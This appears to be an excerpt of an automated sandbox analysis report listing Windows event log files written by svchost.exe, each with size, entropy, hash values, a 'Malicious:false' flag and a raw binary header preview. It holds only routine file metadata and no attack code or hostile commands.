                            Preview:ElfChnk.........$...............$.....................w.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................V...................................**................o...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.497664742301162
                            Encrypted:false
                            SSDEEP:1536:9cRFkL1TWX0gkB/J7oasEfyk2/vKlqRi/PgTZSXwyvy8fJpfrAW+Cr6SXlUr20G8:9cRFkL1TWX0gkB/J7oasEfyk2/vKlqk0
                            MD5:39D50AC0A6FB19B10351B0B95864C553
                            SHA1:C3226D2043EC640AB3DEB9126CA837BB64C6267A
                            SHA-256:67DD28B8A168FBFC6E3CF184443D299D40E7DA612828E0E1106F57F9BF8CB794
                            SHA-512:345DA4736EEA092AD079D82232DB958C7CBA18B5D96805A81E2A31C7C8D442FE3715BCE5D69764C3AB0F71F94FA9416A3C2A363B228AF1A5A1A4EE9AF3AA9F62
                            Malicious:false
                            Preview:ElfChnk.>...............>...........................=3.z....................................................................6WY ................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................A...............&...i.......~......................**......>........Q.U..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.495116691902589
                            Encrypted:false
                            SSDEEP:384:ShN7s7o787l7r787a7J7z7+7N17g7x7o7g7gY7hZ7D7k7F7r7wm7NP7Y7+7fa7lX:S9HuCg
                            MD5:8F5FACAEC835E59EB086543AA14D1E5D
                            SHA1:9C7A60C39666234A41FCAE59B937DC293D78D89E
                            SHA-256:E6452075DCD968D2B4CC467515B3D7BA3AAF671A5132D6D40B87D1E50E4C876A
                            SHA-512:1D965EA89653B71D11BE8AEF985E718E869D8AAEC6C055F999CDC8A63ACD28FA39E7C4A6979B7D2024F3DE39466296B852279223FBC6935D635F0189E58C0240
                            Malicious:false
                            Preview:ElfChnk.Y.......g.......Y.......g............%...&..J]......................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............................................................s.......................**......Y........................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.1499045494600955
                            Encrypted:false
                            SSDEEP:384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
                            MD5:2045FB0D54CA8F456B545859B9F9B0A8
                            SHA1:35854F87588C367DE32A3931E01BC71535E3F400
                            SHA-256:E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
                            SHA-512:013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
                            Malicious:false
                            Preview:ElfChnk.........;...............;...........xk...m...+.....................................................................F.~.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................6f..w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.8164696340947971
                            Encrypted:false
                            SSDEEP:384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
                            MD5:1AB19FA472669F4334C7A9D44E94E1B3
                            SHA1:F71C16706CFA9930045C9A888FDB3EF46CACC5BC
                            SHA-256:549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
                            SHA-512:72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
                            Malicious:false
                            Preview:ElfChnk...................................... ..x$../..........................................................................<................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................!..................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.9855903635327656
                            Encrypted:false
                            SSDEEP:384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
                            MD5:7BCA54AC75C7185ADFBB42B1A84F86E3
                            SHA1:AD91EE55A6F9F77AD871ACA9A5B59987CA679968
                            SHA-256:A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
                            SHA-512:79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
                            Malicious:false
                            Preview:ElfChnk.....................................P+...,...0........................................................................9.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F...........................U.......................%%......&...................................................>...........................E.......**..............o.m...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.165454452307923
                            Encrypted:false
                            SSDEEP:384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
                            MD5:B6B6F199DA64422984403D7374F32528
                            SHA1:980D66401DFCCF96ADDDAF22334A5CE735554E7F
                            SHA-256:8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
                            SHA-512:5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
                            Malicious:false
                            Preview:ElfChnk.........'...............'...........P.......H:Z.....................................................................gO.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................f..................................**..............m.................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.8519554794255333
                            Encrypted:false
                            SSDEEP:384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
                            MD5:4140628CA3CEC29C0B506CEEBDF684F6
                            SHA1:A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
                            SHA-256:1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
                            SHA-512:779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
                            Malicious:false
                            Preview:ElfChnk.\...............\.......................0..../........................................................................v................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.1642919553794224
                            Encrypted:false
                            SSDEEP:384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
                            MD5:D7EECF043241FDB9486580582E208603
                            SHA1:045D5672A8E9884B78CD31C52D372375503CBF4F
                            SHA-256:6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
                            SHA-512:6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
                            Malicious:false
                            Preview:ElfChnk.....................................02..h6...u'.....................................................................1..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................V2............................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.576079103773187
                            Encrypted:false
                            SSDEEP:768:oQvIZi8Ns5iLV8gRai8ZijiTEOmGkoeiDpbq:Vm+Jao7mce8p2
                            MD5:5096A411FC8DE7A2EFE92D23786E1D4C
                            SHA1:DA92531A9728B9F56DCF5148A2C40C92A9FD4758
                            SHA-256:617D84832BBDD349A4E2D0FC818A40AAF4C6F637149839DEBCB32E522D9D6AEC
                            SHA-512:37E6AD0C7429FBE8358803D723D827FD434005106171FC4008AFE45FECAD93997C0E26EED4C7B90A21E054C663463B720F6F169CF8263715041807AFCA33AD91
                            Malicious:false
                            Preview:ElfChnk.........................................."...9.Z....................................................................B.. ........................................4...=...........................................................................................................................f...............?...........................m...................M...F...........................................................U...................................................&...................................**..0...........|R...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.178629627614653
                            Encrypted:false
                            SSDEEP:384:shL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUmLjUm:sY7Lu
                            MD5:FCEF23A3691F5D78A27C76D95B2F5ACA
                            SHA1:E3F120D9DB395881D78867302DB16507D5C80E6C
                            SHA-256:F0E54B18E4C12AF5DBBA107ACAF7F6DA974A72AF12B7AD22BB1AD9D9A6BAB2C7
                            SHA-512:63F56C9337D1DE757655594F51B967EC4D3F7CD2CF28E4F75AC3123A2B5B11A33B343B85EEE1BB7C1C6482EE0AEC91B5E7B72502F0E15310F86E810DEC155C67
                            Malicious:false
                            Preview:ElfChnk....................................../..(4....\.....................................................................G................... .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&..................................................................................../..................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.2040196879846349
                            Encrypted:false
                            SSDEEP:48:MVW4XrP+MZQNRBEZWTENO4bpBkoDlgD/6FgVt:A5KNVaO80oZgD/6Fg
                            MD5:874B3F865EE985A801125E4649C849FE
                            SHA1:20E2318217B84C7180FB988DFD93F3F5943D9808
                            SHA-256:CAF7DB29DB1E6C58EC894D5242E0692BE134FF4845F12A0DC03BA439B34486A6
                            SHA-512:794C55E71C3570120620395E78E26729A6178F36588CF19B2CA976ADB7F100FB14E2318998EC4983FFA6D2EA92E6C9EBB54003AB7647DBE72DA34136A28B7106
                            Malicious:false
                            Preview:ElfChnk.............................................B........................................................................5.O................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**...............................&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.6469884746870727
                            Encrypted:false
                            SSDEEP:384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
                            MD5:FC81D9FBA555C6BC7223594B8F6B46DE
                            SHA1:971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
                            SHA-256:9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
                            SHA-512:7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
                            Malicious:false
                            Preview:ElfChnk.y...............y................... Q..(S...b.......................................................................t..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F...............................................................................................................VG..................................**......y..........:............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.4067373813600383
                            Encrypted:false
                            SSDEEP:768:hWa0NPaDaLaPa3ababafa3ananabaHaXarafa7ajaHajaTavaO6a3ajaPa7aXafC:KNH
                            MD5:C9086547BF5F9E822F359679E7F67F40
                            SHA1:2127B927EF9B279FC383FEE43C8B44E92864FF85
                            SHA-256:327257210F79945FB3AE7D54F04FC2BE85846177A9CEE0499AFC206F6DE5F944
                            SHA-512:887882FA560420B90E0D5214C5025BFB3BFF2D1B3670F4E4957CFA65531E2524F2E41E651B61AABCBCB89613038BF5AFEE0CBFF582EA520956172D1337C31D24
                            Malicious:false
                            Preview:ElfChnk.........@...............@...............`......s......................................................................h................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...................................**..H.............0...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.3132453844344478
                            Encrypted:false
                            SSDEEP:384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
                            MD5:6237EE0458A0478242B975E9BB7AA97D
                            SHA1:6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
                            SHA-256:C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
                            SHA-512:56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
                            Malicious:false
                            Preview:ElfChnk......................................<...A.........................................................................i,.q................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................<......C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.325262033408211
                            Encrypted:false
                            SSDEEP:384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
                            MD5:D13189B45679E53F5744A4D449F8B00F
                            SHA1:ED410CAB42772E329F656B4793B46AC7159CF05B
                            SHA-256:BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
                            SHA-512:83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
                            Malicious:false
                            Preview:ElfChnk.....................................h.................................................................................-.................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................1...........&.......................................................................................**..x...........~_g...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.7947046118743749
                            Encrypted:false
                            SSDEEP:384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
                            MD5:55E73A924B170FBFFF862E8E195E839A
                            SHA1:3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
                            SHA-256:1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
                            SHA-512:E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
                            Malicious:false
                            Preview:ElfChnk...................................... ..X"...........................................................................?.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................3...........................&.......................................................................................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 9, DIRTY
                            Category:dropped
                            Size (bytes):84544
                            Entropy (8bit):2.0943351215716235
                            Encrypted:false
                            SSDEEP:1536:YMpP9JcY6+g4+Ga67MpP9JcY6+g4+Ga6DMpP9JcY6+g4+Ga6F:YMpP9JcY6+g4+Ga67MpP9JcY6+g4+Gah
                            MD5:6B97F9A35583E15C3DC8274B3F0A7C72
                            SHA1:3EF206DEA358D780843CCAA28B9A40181546FB14
                            SHA-256:543F899BE6482935B952D0867AF10C6B064E23D934EF374AFD55DAA67B3A8155
                            SHA-512:A8212DFF9DFF9B6241868C752FF84024ED6A61A2767838AC1FA983C768F7DF2A38D7119850556AC3AC95D991024A2F5E1330779B6032C6CF0FFF627E7A48CBA5
                            Malicious:false
                            Preview:ElfFile.........................................................................................................................ElfChnk.....................................p ..."..x.......................................................................N{..................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................^...3...............................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):66560
                            Entropy (8bit):4.362194486499595
                            Encrypted:false
                            SSDEEP:384:1cRqxhSRumRtRqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8R+PRdO:1pxA8nPLGbMb
                            MD5:6AA5FD4D824EFD4448C04B35C094FF56
                            SHA1:B4EF0825ADCF4192C9F9E9E223077517D77E4BE5
                            SHA-256:E1440DDE27BCA23A2D29924AF202F43F54172C55AEF549E71F41DC08B532EDC8
                            SHA-512:E1378BB8FF3F6FBC56648CAD6168F59CB62AB01F42A6992F34D14C6B46D2498176E17F01C4DD63D15273491D38AF1A16791F014BB469F4292ABE8C9D1823C630
                            Malicious:false
                            Preview:ElfChnk............................................./I......................................................................+s.......................y.......x..N...........=............................................y..................}y..3...........................................c......xb..f...h.......lc..?.......................h........c......M.......M...F...9c..............................................Qb..............................................A.......i.......................&............x..**...............S..1..........x68................................................................<.......T.....!................@.S..1...KK..A..K..U.8.w.....\........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l......Qb......................N...W.M.I.P.r.o.v.......w.m.i.p.r.v.s.e...e.x.e.......%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.b.e.m.\.w.m.i.p
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.273338343434408
                            Encrypted:false
                            SSDEEP:384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
                            MD5:C37372EB51AEDB4552CB839C7294403A
                            SHA1:7B7C408D72B084CE36AA6B623AC6B907FD21D569
                            SHA-256:C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
                            SHA-512:69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
                            Malicious:false
                            Preview:ElfChnk....................................................................................................................x...........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............i.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.231195890775603
                            Encrypted:false
                            SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
                            MD5:3365A34953FD7B16667108A049B64DA5
                            SHA1:C72421A58E063D64072152344B266F8306A78702
                            SHA-256:AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
                            SHA-512:A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
                            Malicious:false
